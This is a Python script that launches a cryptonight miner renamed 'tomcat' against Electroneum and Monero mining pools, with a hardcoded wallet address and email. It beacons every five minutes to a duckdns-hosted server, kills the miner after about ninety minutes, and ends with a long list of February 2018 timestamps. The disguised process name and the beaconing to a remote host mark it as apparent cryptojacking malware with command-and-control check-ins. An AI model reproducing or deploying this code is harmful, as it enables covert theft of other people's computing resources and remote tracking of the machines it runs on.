import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:11:01.329236
#2018-02-17 16:57:07.131236
#2018-02-17 18:46:04.382562
#2018-02-17 20:34:07.727862
#2018-02-17 22:20:08.856627
#2018-02-18 00:04:07.508939
#2018-02-18 01:55:01.775277
#2018-02-18 03:42:07.886839
#2018-02-18 05:29:01.882104
#2018-02-18 07:21:04.144029
#2018-02-18 09:09:01.511665
#2018-02-18 10:54:06.954086
#2018-02-18 12:42:05.338854
#2018-02-18 14:29:07.496266
#2018-02-18 16:19:06.412691
#2018-02-18 18:09:07.091414
#2018-02-18 19:55:06.903951
#2018-02-18 21:41:07.368712
#2018-02-18 23:29:05.567911
#2018-02-19 01:16:01.339241
#2018-02-19 03:02:04.012654
#2018-02-19 04:48:01.320437
#2018-02-19 06:33:07.395974
#2018-02-19 08:22:04.616562
#2018-02-19 10:12:04.498105
#2018-02-19 12:01:02.169195
#2018-02-19 13:47:11.716099
#2018-02-19 15:37:04.075984
#2018-02-19 17:23:07.857957
#2018-02-19 19:10:01.303899
#2018-02-19 20:56:04.142418
#2018-02-19 22:44:04.451772
#2018-02-20 00:27:07.762863
#2018-02-20 02:16:07.223806
#2018-02-20 04:08:05.040538
#2018-02-20 05:51:05.487055
#2018-02-20 07:37:05.415576
#2018-02-20 09:22:06.650039
#2018-02-20 11:06:07.770826
#2018-02-20 12:52:11.503082
#2018-02-20 14:38:08.847676
#2018-02-20 16:22:04.581413
#2018-02-20 18:10:08.970861
#2018-02-20 20:02:08.105750
#2018-02-20 21:50:06.748449
#2018-02-20 23:31:08.343905
#2018-02-21 01:16:05.996033
#2018-02-21 03:05:06.057101
#2018-02-21 04:52:04.079704
#2018-02-21 06:39:07.306837
#2018-02-21 08:26:06.732031
#2018-02-21 10:12:06.296143
#2018-02-21 11:59:08.421813
#2018-02-21 13:49:06.174756
#2018-02-21 15:31:10.344932
#2018-02-21 17:22:02.185636
#2018-02-21 19:09:01.913270
#2018-02-21 20:57:07.961736
#2018-02-21 22:44:07.108456
#2018-02-22 00:35:10.280443
#2018-02-22 02:22:05.688725
#2018-02-22 04:10:07.086898
#2018-02-22 05:55:07.464110
#2018-02-22 07:43:05.282633
#2018-02-22 09:32:01.895257
#2018-02-22 11:17:08.247874
#2018-02-22 13:04:01.823660
#2018-02-22 14:51:04.544743
#2018-02-22 16:37:07.207731
#2018-02-22 18:22:01.455527
#2018-02-22 20:14:08.523892
#2018-02-22 22:02:05.657041
#2018-02-22 23:48:07.245397
#2018-02-23 01:36:06.091753
#2018-02-23 03:22:05.454685
#2018-02-23 05:08:05.112628
#2018-02-23 06:52:06.737403
#2018-02-23 08:42:01.511557
#2018-02-23 10:58:01.614738
#2018-02-23 12:53:06.558981
#2018-02-23 14:38:08.770163
#2018-02-23 16:28:07.639622
#2018-02-23 18:14:04.704953
#2018-02-23 19:58:06.206039
#2018-02-23 21:41:05.956878
#2018-02-23 23:35:04.814047
#2018-02-24 01:23:07.342233
#2018-02-24 03:14:01.841976
#2018-02-24 04:59:06.163402
#2018-02-24 06:46:02.235930
#2018-02-24 08:41:04.793108
#2018-02-24 10:25:08.465116
#2018-02-24 12:20:08.157176
#2018-02-24 14:13:03.901942
#2018-02-24 16:00:08.053916
#2018-02-24 17:52:05.100959
#2018-02-24 19:39:05.092972
#2018-02-24 21:26:04.589427
#2018-02-25 00:08:04.058186
#2018-02-25 04:20:03.533410
#2018-02-25 07:52:01.324423